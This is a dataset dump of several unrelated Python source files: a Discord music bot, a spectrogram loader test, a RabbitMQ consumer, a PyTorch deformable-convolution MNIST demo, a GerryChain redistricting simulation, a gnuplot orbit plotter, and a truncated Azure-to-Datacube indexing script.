romkan.to_roma(next.title).lower()\n for c, r in replaces.items():\n t = t.replace(c, r)\n t = \"\".join(c for c in t if c in can_pronounce)\n data = await self.tts._say('Now Playing: {}'.format(t),\n voice=\"dfki-prudence\")\n with open(source, \"wb\") as f:\n f.write(data)\n self.source = sources.TTSOverlay(self.source, source,\n self, vc=self.vc)\n self.vc.source = self.source\n except Exception as e:\n print(e)\n else:\n self.source = next\n self.vc.play(next, after=lambda: self.skip(e=\"errorskip\"))\n\n def start(self):\n self._stop = False\n self._skip = False\n self._task = self.vc.loop.create_task(self.process_queue())\n\n async def stop(self):\n self._stop = True\n await self.vc.disconnect()\n self._task.cancel()\n self.vc.stop()\n self._queue.clear()\n del self.cog.players[self.chan.guild.id]\n\n def skip(self, e=None):\n if e is not None:\n print(e)\n\n if e == \"errorskip\":\n self.source = None\n self._skip = True\n\n async def process_queue(self):\n try:\n await self.download_next()\n queue_next = True\n\n while True:\n if self._stop:\n break\n\n await asyncio.sleep(1)\n try:\n if self.current_song.is_stream:\n # Streams have no duration\n continue\n except AttributeError as e:\n # print(e, \"No current song!\")\n # current_song not yet loaded\n continue\n\n now = time.time()\n time_left = self.current_song.duration - (now-self._start_time)\n self.percentage = 1 - (time_left / self.current_song.duration)\n if time_left <= 20 or self._skip:\n if queue_next is False and not self._skip:\n # print(\"ignoring\")\n continue\n\n if self._skip:\n self._skip = False\n\n queue_next = False\n # Less than 20 seconds left until\n # the song ends, start the next song.\n if len(self._queue) > 0:\n # There are still songs queued\n\n if isinstance(self.source, sources.OverlaySource):\n self.source = self.source._overlay_source\n self.vc.source = self.source\n\n # print(\"Downloading next song\")\n await self.download_next()\n now = time.time()\n time_left = (self.current_song.duration -\n (now-self._start_time))\n for _ in range(round(time_left)*2):\n try:\n self.source.vol_change_step()\n self.source.vol_change_step()\n await asyncio.sleep(0.5)\n except:\n break\n\n else:\n await asyncio.sleep(time_left)\n await self.chan.send(\"Queue empty, stopping...\")\n data = await self.tts._say('Queue empty, stopping...',\n voice=\"dfki-prudence\")\n source = \"song_cache/{}.wav\".format(self.chan.id)\n with open(source, \"wb\") as f:\n f.write(data)\n self.source = sources.TTSOverlay(self.source, source,\n self, vc=self.vc)\n self.vc.source = self.source\n await self.stop()\n\n else:\n queue_next = True\n except:\n traceback.print_exc()\n\n\nclass music:\n def __init__(self, amethyst):\n self.amethyst = amethyst\n self.players = {}\n\n @commands.command(name='play')\n async def music_play(self, ctx, *, song: str):\n start = False\n if ctx.guild.id not in self.players:\n vc = await ctx.author.voice.channel.connect(reconnect=True)\n self.players[ctx.guild.id] = Player(vc, ctx.channel, self)\n start = True\n\n await self.players[ctx.guild.id].queue(song, requester=ctx.author)\n\n if start:\n self.players[ctx.guild.id].start()\n\n @commands.command(name='queue')\n async def music_playlist(self, ctx):\n player = self.players[ctx.guild.id]\n queue = []\n for song in player._queue.queue:\n s = song.title\n if song.requester == ctx.author:\n s = \"**{}**\".format(s)\n queue.append(s)\n\n t = (\"**Now playing:** __{}__\"\n \"\\n**Queue:** \\n{}\").format(\n player.current_song.title,\n \"\\n\".join(queue))\n await ctx.send(t)\n\n @commands.command(name=\"disconnect\")\n async def music_disconnect(self, ctx):\n await self.players[ctx.guild.id].stop()\n\n @commands.command(name=\"song\")\n async def music_current_song(self, ctx):\n song = self.players[ctx.guild.id].current_song\n title = song.title\n url = song.url\n req = str(song.requester)\n upl = song.uploader\n perc = self.players[ctx.guild.id].percentage\n prog = \"#\"*round(perc*10)+\"-\"*round((1-perc)*10)\n\n e = discord.Embed(title=\"Now Playing\",\n description=title)\n\n e.add_field(name=\"Source\", value=\"[Click here!]({})\".format(url))\n e.add_field(name=\"Progress\", value=\"`[{}]` - {}%\".format(\n prog, round(perc*100)))\n e.add_field(name=\"Uploaded by\", value=upl, inline=True)\n e.add_field(name=\"Requested by\", value=req, inline=True)\n\n if song.thumbnail:\n e.set_thumbnail(url=song.thumbnail)\n\n await ctx.send(embed=e)\n\n @commands.command(name=\"skip\")\n async def music_skip(self, ctx):\n if ctx.author == self.players[ctx.guild.id].current_song.requester:\n self.players[ctx.guild.id].skip()\n else:\n await ctx.send(\"Skipping has only been implemented for the\"\n \" person who queued the song.\")\n\n\ndef setup(amethyst):\n amethyst.add_cog(music(amethyst))\n","sub_path":"modules/music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":16767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"82640053","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 18 09:56:28 2017\n\n@author: hsadeghi\n\"\"\"\n\nfrom spectrogram_loader import data_loader, data_parser\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#%%\nnum_files = 1\nbatch_size = 1\n\nprint(\"Loading data started\") \ninput_dim = 2**13\ndata = {}\nfor i in range(num_files):\n data[i] = data_loader(i, input_dim)\n\nprint(\"Loading data finished\") \n\n#%%\ndef inf_train_gen(data=data):\n while True:\n rand_ind = np.random.randint(0, num_files)\n yield data_parser(data[rand_ind], input_dim, batch_size)\n \nloader = inf_train_gen()\n\n#%%\n\nfor i in range(5):\n \n Sxx = next(loader)\n\n print('Sxx.shape after split', Sxx.shape)\n \n plt.figure()\n img = np.squeeze(Sxx[0,:,:,0])\n# img = img + abs(np.min(img))\n# img = img/np.max(img)\n plt.imshow(img)\n print('min(img)', np.min(img))\n print('max(img)', np.max(img))\n \n# plt.figure()\n# plt.pcolormesh(Sxx[0])\n# plt.ylabel('Frequency [Hz]')\n# plt.xlabel('Time [sec]')\n# plt.show()\n# # plt.pause(1)\n# \n# Sxx = next(loader)\n# \n# print('Sxx.shape after split', [len(Sxx), Sxx[0].shape])\n# print(\"max(Sxx)\", np.max(Sxx[0]))\n# \n# plt.figure()\n# plt.pcolormesh(Sxx[0])\n# plt.ylabel('Frequency [Hz]')\n# plt.xlabel('Time [sec]')\n# plt.show()\n\n\n","sub_path":"december/tf-dcgan/test_loading_images.py","file_name":"test_loading_images.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"571787500","text":"import pika\nimport json\n'''\n消费者\n'''\n# 获取连接\nconnection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\n# 拿到 channel\nchannel = connection.channel()\n# 声明需要的 queue\n'''\n持久化\n`durable=True`\n配置一次获取多少消息\n`prefetch_count=2` ['pri:'fetʃ]\n'''\nchannel.queue_declare(queue='a', durable=True)\n\n# 定义一次取几条消息\nchannel.basic_qos(prefetch_count=2)\n\n\n# 定义获取消息的回调处理函数\ndef callback(ch, method, properties, body):\n import time\n time.sleep(10)\n body = json.loads(body.decode())\n print(body.get('123'))\n ch.basic_ack(delivery_tag = method.delivery_tag)\n\n\nchannel.basic_consume(callback, queue='a', no_ack=False)\n# channel.basic_consume(callback, queue='b', no_ack=True)\n# 接收消息\nchannel.start_consuming()","sub_path":"ProgrammingLanguage/Python/book/rabbitmq/consuming.py","file_name":"consuming.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"158882297","text":"from __future__ import print_function\n\nimport argparse\nimport random\nfrom time import time\n\nimport numpy as np\nimport torch\nimport torch.cuda\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.utils.data\nfrom torchvision import datasets, transforms\nfrom tqdm import tqdm\n\nfrom deform_conv import DeformConv2D\n\n\nclass DeformNet(nn.Module):\n def __init__(self):\n super(DeformNet, self).__init__()\n self.conv1 = nn.Conv2d(1, 32, kernel_size=3, padding=1)\n self.bn1 = nn.BatchNorm2d(32)\n\n self.conv2 = nn.Conv2d(32, 64, kernel_size=3, padding=1)\n self.bn2 = nn.BatchNorm2d(64)\n\n self.conv3 = nn.Conv2d(64, 128, kernel_size=3, padding=1)\n self.bn3 = nn.BatchNorm2d(128)\n\n # deformable convolution\n self.offsets = nn.Conv2d(128, 18, kernel_size=3, padding=1)\n self.conv4 = DeformConv2D(128, 128, kernel_size=3, padding=1)\n self.bn4 = nn.BatchNorm2d(128)\n\n self.classifier = nn.Linear(128, 10)\n\n def forward(self, x):\n # convs\n x = F.relu(self.conv1(x))\n x = self.bn1(x)\n x = F.relu(self.conv2(x))\n x = self.bn2(x)\n x = F.relu(self.conv3(x))\n x = self.bn3(x)\n\n # deformable convolution\n offsets = self.offsets(x)\n x = F.relu(self.conv4(x, offsets))\n x = self.bn4(x)\n\n x = F.avg_pool2d(x, kernel_size=28, stride=1).view(x.size(0), -1)\n x = self.classifier(x)\n\n return F.log_softmax(x, dim=1)\n\n\nclass PlainNet(nn.Module):\n def __init__(self):\n super(PlainNet, self).__init__()\n self.conv1 = nn.Conv2d(1, 32, kernel_size=3, padding=1)\n self.bn1 = nn.BatchNorm2d(32)\n\n self.conv2 = nn.Conv2d(32, 64, kernel_size=3, padding=1)\n self.bn2 = nn.BatchNorm2d(64)\n\n self.conv3 = nn.Conv2d(64, 128, kernel_size=3, padding=1)\n self.bn3 = nn.BatchNorm2d(128)\n\n self.conv4 = nn.Conv2d(128, 128, kernel_size=3, padding=1)\n self.bn4 = nn.BatchNorm2d(128)\n\n self.classifier = nn.Linear(128, 10)\n\n def forward(self, x):\n # convs\n x = F.relu(self.conv1(x))\n x = self.bn1(x)\n x = F.relu(self.conv2(x))\n x = self.bn2(x)\n x = F.relu(self.conv3(x))\n x = self.bn3(x)\n x = F.relu(self.conv4(x))\n x = self.bn4(x)\n\n x = F.avg_pool2d(x, kernel_size=28, stride=1).view(x.size(0), -1)\n x = self.classifier(x)\n\n return F.log_softmax(x, dim=1)\n\n\ndef init_weights(m):\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n nn.init.xavier_uniform_(m.weight, gain=nn.init.calculate_gain('relu'))\n if m.bias is not None:\n m.bias.data = torch.zeros(m.bias.shape[0])\n\n\ndef init_conv_offset(m):\n m.weight.data = torch.zeros_like(m.weight.data)\n if m.bias is not None:\n m.bias.data = torch.zeros(m.bias.shape[0])\n\n\ndef main(args, device):\n train_loader = torch.utils.data.DataLoader(\n datasets.MNIST('./MNIST', train=True, download=True,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=args.batch_size, shuffle=True, num_workers=0, pin_memory=True\n )\n\n test_loader = torch.utils.data.DataLoader(\n datasets.MNIST('./MNIST', train=False, download=True,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=args.test_batch_size, shuffle=True, num_workers=0, pin_memory=True\n )\n\n model = DeformNet()\n # model = PlainNet()\n\n model.apply(init_weights)\n try:\n model.offsets.apply(init_conv_offset)\n except AttributeError:\n pass\n\n model = model.to(device)\n\n optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum)\n\n def train(epoch):\n model.train()\n for batch_idx, (data, target) in enumerate(train_loader):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = F.nll_loss(output, target)\n loss.backward()\n optimizer.step()\n if batch_idx % args.log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.dataset),\n 100. * batch_idx / len(train_loader), loss.item()))\n\n def test():\n model.eval()\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in tqdm(test_loader):\n data, target = data.to(device), target.to(device)\n output = model(data)\n test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss\n pred = output.max(dim=1)[1] # get the index of the max log-probability\n correct += pred.eq(target).sum().item()\n\n test_loss /= len(test_loader.dataset)\n print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n test_loss, correct, len(test_loader.dataset),\n 100. * correct / len(test_loader.dataset)))\n\n for epoch in range(1, args.epochs + 1):\n since = time()\n train(epoch)\n iter = time() - since\n print(\"Spends {}s for each training epoch\".format(iter / args.epochs))\n test()\n\n\nif __name__ == '__main__':\n # Training settings\n parser = argparse.ArgumentParser(description='PyTorch MNIST Example')\n parser.add_argument('--batch-size', type=int, default=32, metavar='N',\n help='input batch size for training (default: 32)')\n parser.add_argument('--test-batch-size', type=int, default=32, metavar='N',\n help='input batch size for testing (default: 32)')\n parser.add_argument('--epochs', type=int, default=10, metavar='N',\n help='number of epochs to train (default: 10)')\n parser.add_argument('--lr', type=float, default=0.01, metavar='LR',\n help='learning rate (default: 0.01)')\n parser.add_argument('--momentum', type=float, default=0.5, metavar='M',\n help='SGD momentum (default: 0.5)')\n parser.add_argument('--no-cuda', action='store_true', default=False,\n help='disables CUDA training')\n parser.add_argument('--seed', type=int, default=1, metavar='S',\n help='random seed (default: 1)')\n parser.add_argument('--log-interval', type=int, default=10, metavar='N',\n help='how many batches to wait before logging training status')\n args = parser.parse_args()\n\n args.cuda = not args.no_cuda and torch.cuda.is_available()\n\n random.seed(args.seed)\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n if torch.cuda.is_available() and args.cuda:\n torch.cuda.manual_seed(args.seed)\n torch.backends.cudnn.enabled = True # Enables cudnn\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True # To have ~deterministic results\n device = torch.device('cuda')\n else:\n device = torch.device('cpu')\n\n main(args, device)\n","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":7459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"636555712","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 9 16:47:51 2020\n\n@author: dinos\n\nthis version normalizes initial partition to 50% dem /republican\nThis does NOT perform a Markov chain simulation but instead recreates EACH instance of a simulated district partition from scratch\nusing recursive_tree_part to create random districts. While this is slow, \nSome nice stuff added to DataFrame structure to add congressional district labels in order of actual increasing congressional district No.\n\ndependencies include stopit - install with pip (conda install didn't work for me)\nIt prevents recursive_tree_part from getting hung-up indefinitely, uses time_out to define maximum limit before timing out\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nCreated on Tue Mar 24 16:55:12 2020\nuses recom proposal\n@author: dpg\n\"\"\"\n\n\nimport backup_chain as bc\nfrom multiprocessing import set_start_method, freeze_support\n#from multiprocessing import Pool\nfrom multiprocessing import get_context\nimport backup_chain as bc\nimport matplotlib.pyplot as plt\nimport time\nimport stopit\nfrom gerrychain import (GeographicPartition, Partition, Graph, MarkovChain,\n proposals, updaters, constraints, accept, Election)\nfrom gerrychain.proposals import recom\nfrom gerrychain.tree import recursive_tree_part\nfrom functools import partial\nfrom strcmp_matlab import strfilter\nimport pandas\nimport numpy as np\nfrom gerrychain.metrics import mean_median, efficiency_gap, polsby_popper\nfrom get_districtlabels import get_labels\nfrom norm_50 import norm_data\nfrom get_electioninfo import get_elections\nimport random\nimport os \n \ndef multichain_run(i1, graph, chainlength, my_apportionment, poptol, my_electionproxy, my_electionproxy_alternate, rsw, rmm, reg, rpp, datastruct, state):\n\n # poptol = 0.06 #min % population deviation per district\n totsteps = 2\n elections, composite = get_elections(state)\n time_out=400\n if \"TOTPOP\" in graph._node[0]:\n popkey = \"TOTPOP\"\n elif \"PERSONS\" in graph._node[0]:\n popkey = \"PERSONS\"\n else:\n popkey = []\n print(\"woops no popkey in file, look @ graph._node[0] to figure out what the keyword for population is\\n\")\n#CONFIGURE UPDATERS\n#We want to set up updaters for everything we want to compute for each plan in the ensemble.\n\n\n# Population updater, for computing how close to equality the district\n# populations are. \"TOTPOP\" is the population column from our shapefile.\n my_updaters = {\"population\": updaters.Tally(popkey, alias=\"population\")}\n\n\n# Election updaters, for computing election results using the vote totals\n# from our shapefile.\n election_updaters = {election.name: election for election in elections}\n my_updaters.update(election_updaters)\n\n\n#INITIAL PARTITION\n initial_partition, graph, my_updaters = norm_data(graph, my_updaters, my_apportionment, my_electionproxy, my_electionproxy_alternate, state)\n \n #this block obtains the Congressional District Labels and converts to string labels, cds\n \n cds = get_labels(initial_partition, my_electionproxy) #get congressional district labels\n nparts = len(initial_partition)\n ideal_population = sum(list(initial_partition[\"population\"].values())) / len(initial_partition)\n random.seed(os.urandom(10)*i1) \n \n pop_constraint = constraints.within_percent_of_ideal_population(initial_partition, poptol)\n proposal = partial(recom,\n pop_col=popkey,\n pop_target=ideal_population,\n epsilon=poptol,\n node_repeats=2\n )\n itno = 0\n for zz in range(chainlength):\n with stopit.ThreadingTimeout(time_out) as to_ctx_mgr:\n assert to_ctx_mgr.state == to_ctx_mgr.EXECUTING\n ranpart = recursive_tree_part(graph, range(nparts), ideal_population, popkey,poptol-0.02,node_repeats=1)\n randpartition = GeographicPartition(graph,assignment = ranpart, updaters = my_updaters)\n \n if to_ctx_mgr.state == to_ctx_mgr.EXECUTED:\n compactness_bound = constraints.UpperBound(\n lambda p: len(p[\"cut_edges\"]),\n 2*len(initial_partition[\"cut_edges\"])\n )\n chain = MarkovChain(\n proposal=proposal,\n constraints=[\n pop_constraint,\n compactness_bound],\n accept=accept.always_accept,\n initial_state=randpartition,\n total_steps = totsteps\n )\n \n \n print(i1, \" got here\\n\")\n for part in chain:\n rsw.append(part[my_electionproxy].wins(\"Democratic\"))\n rmm.append(mean_median(part[my_electionproxy]))\n reg.append(efficiency_gap(part[my_electionproxy]))\n # rpp.append(np.mean(pd.Series(polsby_popper(part)))) #depends on geometry of the partition only not on vote outcomes\n datax = pandas.DataFrame(sorted(part[my_electionproxy].percents(\"Democratic\" )), index=cds)\n datax = datax.transpose()\n # data1 = pandas.concat([data1, pandas.DataFrame(part[\"SEN12\"].percents(\"Democratic\" ))],axis=1)\n datastruct = pandas.concat([datastruct, datax])\n if itno % 1 == 0:\n print(\"worker \", i1, \" iteration = \", itno, \"chain = \", zz ,\"\\n\")\n itno+=1\n \n elif to_ctx_mgr.state == to_ctx_mgr.TIMED_OUT:\n print(\"time out, worker \", i1, \"\\n\")\n for kk in range(totsteps):\n rsw.append(-1 )\n rmm.append(-100*mean_median(initial_partition[my_electionproxy]))\n reg.append(-100*efficiency_gap(initial_partition[my_electionproxy]))\n rpp.append(-1 )\n datax = pandas.DataFrame(sorted(initial_partition[my_electionproxy].percents(\"Democratic\" )), index=cds)\n datax = datax.transpose()\n # data1 = pandas.concat([data1, pandas.DataFrame(part[\"SEN12\"].percents(\"Democratic\" ))],axis=1)\n datastruct = pandas.concat([datastruct, datax])\n # Eeek the 100 seconds timeout occurred while executing the block\n return i1, rsw, rmm, reg, rpp, datastruct \n \n#MAIN PROGRAM HERE:\n #few key lines for making parallel pool not mess up (freeze_support() and __spec__ definition)\nif __name__ == '__main__':\n freeze_support()\n __spec__ = \"ModuleSpec(name='builtins', loader=)\"\n dontfeedin = 0 #if set=0, feeds in data, otherwise skip\n poolsize=40\n chainlength=50\n totsteps = 2\n normalize='normalized'\n countysp=''\n postfix='2'\n#DEFINE CONSTANTS:\n dontfeedin = 0 #if set=0, feeds in data, otherwise skip\n \n # exec(open(\"input_templates/MI_SENDIST_PRES16.py\").read()) #MI SENATE\n #exec(open(\"input_templates/PA_SEND_SEN12.py\").read()) #PA HOUSE\n exec(open(\"input_templates/TX_HD_SEN12.py\").read()) #TX HOUSE\n # my_electionproxy_alternate = my_electionproxy\n #for PA data:\n \n \n elections, composite = get_elections(state)\n \n \n if 'dontfeedin' in globals():\n if dontfeedin == 0 or not( 'graph' in globals()):\n if \".json\" in my_electiondatafile:\n graph = Graph.from_json(my_electiondatafile)\n else:\n graph = Graph.from_file(my_electiondatafile)\n else:\n if \".json\" in my_electiondatafile:\n graph = Graph.from_json(my_electiondatafile)\n else:\n graph = Graph.from_file(my_electiondatafile)\n \n if 'poptol' not in globals():\n poptol = 0.03\n if \"TOTPOP\" in graph._node[0]:\n popkey = \"TOTPOP\"\n elif \"PERSONS\" in graph._node[0]:\n popkey = \"PERSONS\"\n else:\n popkey = []\n print(\"woops no popkey in file, look @ graph._node[0] to figure out what the keyword for population is\\n\")\n #CONFIGURE UPDATERS\n #We want to set up updaters for everything we want to compute for each plan in the ensemble.\n \n \n # Population updater, for computing how close to equality the district\n # populations are. \"TOTPOP\" is the population column from our shapefile.\n my_updaters = {\"population\": updaters.Tally(popkey, alias=\"population\")}\n \n election_updaters = {election.name: election for election in elections}\n my_updaters.update(election_updaters)\n \n #run chain ONCE to clean up graph and use primary election assignment name...\n #INITIAL PARTITION\n initial_partition = GeographicPartition(graph, assignment=my_apportionment, updaters=my_updaters)\n # initial_partition, graph, my_updaters = norm_data(graph, my_updaters, my_apportionment, my_electionproxy, my_electionproxy_alternate)\n # cds = get_labels(initial_partition, my_electionproxy) #get congressional district labels\n #RUNNING THE CHAIN\n ideal_population = sum(list(initial_partition[\"population\"].values())) / len(initial_partition)\n \n # We use functools.partial to bind the extra parameters (pop_col, pop_target, epsilon, node_repeats)\n # of the recom proposal.\n \n \n t0=time.time()\n #now can do initial_partition and know my_electionproxy will be OK, won't need alternate\n initial_partition, graph, my_updaters = norm_data(graph, my_updaters, my_apportionment, my_electionproxy, my_electionproxy_alternate, state)\n cds = get_labels(initial_partition, my_electionproxy) #get congressional district labels\n # This will take about 10 minutes.\n #setup variables\n rsw = [[0 for x in range(1)] for x in range(poolsize)] # np.zeros([poolsize, chainlength])\n rmm = [[0 for x in range(1)] for x in range(poolsize)] # np.zeros([poolsize, chainlength])\n reg = [[0 for x in range(1)] for x in range(poolsize)] # np.zeros([poolsize, chainlength])\n rpp = [[0 for x in range(1)] for x in range(poolsize)] # np.zeros([poolsize, chainlength])\n data1 = pandas.DataFrame(sorted(initial_partition[my_electionproxy ].percents(\"Democratic\") ), index=cds)\n data1 = data1.transpose()\n datastruct = []\n #setup parallel list of DataFrames\n for nn in range(poolsize):\n datastruct.append(data1)\n \n #key defs for setting up parallel pool HERE:\n ctx = get_context(\"spawn\")\n p = ctx.Pool(poolsize)\n updated_vals = p.starmap(multichain_run, [(i1, graph, chainlength, my_apportionment, poptol, my_electionproxy, my_electionproxy_alternate,\n rsw[i1], rmm[i1], reg[i1], rpp[i1], datastruct[i1], state) for i1 in range(poolsize)])\n \n for i1, rsw_updated, rmm_updated, reg_updated, rpp_updated, datastruct_updated in updated_vals:\n rsw[i1] = rsw_updated\n rmm[i1] = rmm_updated\n reg[i1] = reg_updated\n rpp[i1] = rpp_updated\n datastruct[i1] = datastruct_updated\n #clean up data\n rsw_bak= rsw.copy() #just to be on the safe side\n \n reg_bak = reg.copy()\n \n rmm_bak = rmm.copy()\n datastruct_bak = datastruct.copy()\n for nn in range(poolsize): #clean up since 1st value in each list is a junk '0'\n junk = rsw[nn].pop(0)\n junk = reg[nn].pop(0)\n junk = rmm[nn].pop(0)\n junk = rpp[nn].pop(0)\n \n iter1 = range(chainlength * totsteps) #since the correlation length is 200, only collect every 200th point\n reg_clean = []\n rmm_clean = []\n rsw_clean = []\n rpp_clean = []\n for nn in range(poolsize):\n for kk in iter1: \n if rsw[nn][kk] > -1 : #skip over workers that failed timeout, with -1 in 'won districts'\n reg_clean.append(reg[nn][kk]) \n rmm_clean.append(rmm[nn][kk]) \n rsw_clean.append(rsw[nn][kk]) \n# rpp_clean.append(rpp[nn][kk]) \n \n #data1 = data1.transpose()\n #data1 = pandas.DataFrame((initial_partition[\"SEN12\"].percents(\"Democratic\") ))\n t1=time.time()\n #exec(open(\"condense_datastruct_minimal.py\").read()) #run condense_datastruct.py as a script using this namespace\n # RUN condense_datastruct.py after this to unpack the data structure and plot it\n \n data_condensed = pandas.DataFrame([]) #null dataframe to start\n threadcount = len(datastruct) #depth of datastruct list object\n skipno = 1 # basically, don't skip b/c\n for ii in range(threadcount):\n data_x = datastruct[ii]\n data_x.columns = cds\n sx = data_x.shape\n sx0 = sx[0] #this is the # of iterations per dataframe... loop thru these skipping every 100- 200\n data_x.index = range(sx0)\n # indexer = range(skipno-1, sx0+ skipno-1, skipno) #collect data from these rows\n indexer = range(sx0-1)\n for kk in indexer:\n if rsw[ii][kk] > -1: #skip over workers that timed out\n data_condensed= pandas.concat([data_condensed,data_x[kk:kk+1]])\n \n outname = \"redist_data/\" + state + \"_\" + my_apportionment + \"_\" + my_electionproxy + \"x\" + \\\n str(chainlength)+ \"x\" + str(poolsize) + normalize + postfix\n bc.save1(outname,data_condensed, reg_clean, rmm_clean, rsw_clean, rpp_clean, reg, rmm, rsw, rpp)\n print(t1-t0, \"seconds\\n\") \n plt.figure()\n fig, ax = plt.subplots(figsize=(8, 6))\n \n # Draw 50% line\n ax.axhline(0.5, color=\"#cccccc\")\n \n # Draw boxplot\n #data1.boxplot(ax=ax, positions=range(len(data1.columns)))\n data_condensed.boxplot(positions=range(len(data_condensed.columns)))\n # Draw initial plan's Democratic vote %s (.iloc[0] gives the first row)\n plt.plot(sorted(data1.iloc[0]), \"ro\")\n \n # Annotate\n titlestr = state + \" \" + my_apportionment + \" x\" + str(chainlength) + \" x\" + str(poolsize) + normalize\n ax.set_title(titlestr)\n ax.set_ylabel(\"Democratic vote % \" + my_electionproxy)\n ax.set_xlabel(\"Sorted districts\")\n ax.set_ylim(0, 1)\n ax.set_yticks([0, 0.25, 0.5, 0.75, 1])\n \n plt.show()\n","sub_path":"chain_ppartonly_50.py","file_name":"chain_ppartonly_50.py","file_ext":"py","file_size_in_byte":13914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"80728191","text":"import math as ma\nimport matplotlib.pyplot as py\nfrom pylab import *\nimport scipy as sp\nimport numpy as np\nimport files as fi\nimport os\n\nfilename = raw_input(\"Specify file name of orbit to plot: \")\nfortime = float(raw_input(\"How far forward did the orbit run (billions of years)? \"))\nbacktime = float(raw_input(\"How far back did the orbit run? (billions of years)? \"))\n\ndef plot_my_shit():\n f = open('pauls_rad_gnuplot_script.gnuplot', 'w')\n f.write(\"reset\\n\")\n f.write(\"set xlabel 'X'\\n\")\n f.write(\"set ylabel 'Y'\\n\")\n f.write(\"set zlabel 'Z'\\n\")\n f.write(\"set xzeroaxis\\n\")\n f.write(\"set yzeroaxis\\n\")\n f.write(\"set zzeroaxis\\n\")\n f.write(\"set xrange [\" + str(x_range[0]) + \":\" + str(x_range[1]) + \"]\\n\")\n f.write(\"set yrange [\" + str(y_range[0]) + \":\" + str(y_range[1]) + \"]\\n\")\n f.write(\"set zrange [\" + str(z_range[0]) + \":\" + str(z_range[1]) + \"]\\n\")\n f.write(\"set size square \\n\")\n f.write(\"set title '\" + plot_title + \"'\\n\")\n f.write(\"set term wxt persist size 900,900 \\n\\n\")\n f.write(\"set output 'orbit.png'\\n\")\n f.write(\"splot 'orbit.1.tab' every 1:2002 using 1:2:3 with points pointtype 7 pointsize 0.1, \\\n\t 'hermus.stars.csv' using 1:2:3 with points pointtype 7 pointsize 1 \\n\")\n f.close()\n os.system(\"gnuplot pauls_rad_gnuplot_script.gnuplot\")","sub_path":"backup_2/make_plots.py","file_name":"make_plots.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"109029298","text":"\"\"\"Crawl Thredds for prefixes and fetch YAML's for indexing\nand dump them into a Datacube instance\n\"\"\"\nimport sys\nimport logging\nfrom typing import Tuple\n\nimport click\nfrom odc.azure import find_blobs, download_yamls\nfrom odc.index import from_yaml_doc_stream\nfrom datacube import Datacube\n\nfrom typing import List, Tuple\n\n\ndef dump_list_to_odc(\n account_url,\n container_name,\n yaml_content_list: List[Tuple[bytes, str, str]],\n dc: Datacube,\n products: List[str],\n **kwargs,\n):\n expand_stream = (\n (account_url + \"/\" + container_name + \"/\" + d[1][:d[1].rfind(\"/\") + 1], d[0]) for d in yaml_content_list if\n d[0] is not None\n )\n\n ds_stream = from_yaml_doc_stream(\n expand_stream, dc.index, products=products, **kwargs\n )\n ds_added = 0\n ds_failed = 0\n # Consume chained streams to DB\n for result in ds_stream:\n ds, err = result\n if err is not None:\n logging.error(err)\n ds_failed += 1\n else:\n logging.info(ds)\n try:\n dc.index.datasets.add(ds)\n ds_added += 1\n except Exception as e:\n logging.error(e)\n ds_failed += 1\n\n return ds_added, ds_failed\n\n\n@click.command(\"azure-to-dc\")\n@click.option(\n \"--skip-lineage\",\n is_flag=True,\n default=False,\n help=\"Default is not to skip lineage. Set to skip lineage altogether.\",\n)\n@click.option(\n \"--fail-on-missing-lineage/--auto-add-lineage\",\n is_flag=True,\n default=True,\n help=(\n \"Default is to fail if lineage documents not present in the database. \"\n \"Set auto add to try to index lineage documents.\"\n ),\n)\n@click.option(\n \"--verify-lineage\",\n is_flag=True,\n default=False,\n help=\"Default is no verification. Set to verify parent dataset definitions.\",\n)\n@click.option('--product', '-p', 'product_names',\n help=('Only match against products specified with this option, '\n 'you can supply several by repeating this option with a new product name'),\n multiple=True)\n@click.argument(\"account_url\", type=str, nargs=1)\n@click.argument(\"containter_name\", type=str, nargs=1)\n@click.argument(\"credential\", type=str, nargs=1)\n@click.argument(\"prefix\", type=str, nargs=1)\n@click.argument(\"suffix\", type=str, nargs=1)\ndef cli(\n skip_lineage: bool,\n fail_on_missing_lineage: bool,\n verify_lineage: bool,\n account_url: str,\n container_name: str,\n credential: str,\n product_names: List[str],\n prefix: str,\n suffix: str,\n):\n print(f\"Opening AZ Container {container_name} on {account_url}\")\n print(f\"Searching on prefix '{prefix}' for files matching suffix '{suffix}'\")\n yaml_urls = find_blobs(account_url, container_name, credential, prefix, suffix)\n\n print(f\"Found {len(yaml_urls)} datasets\")\n yaml_contents = download_yamls(yaml_urls)\n\n print(f\"Matching to 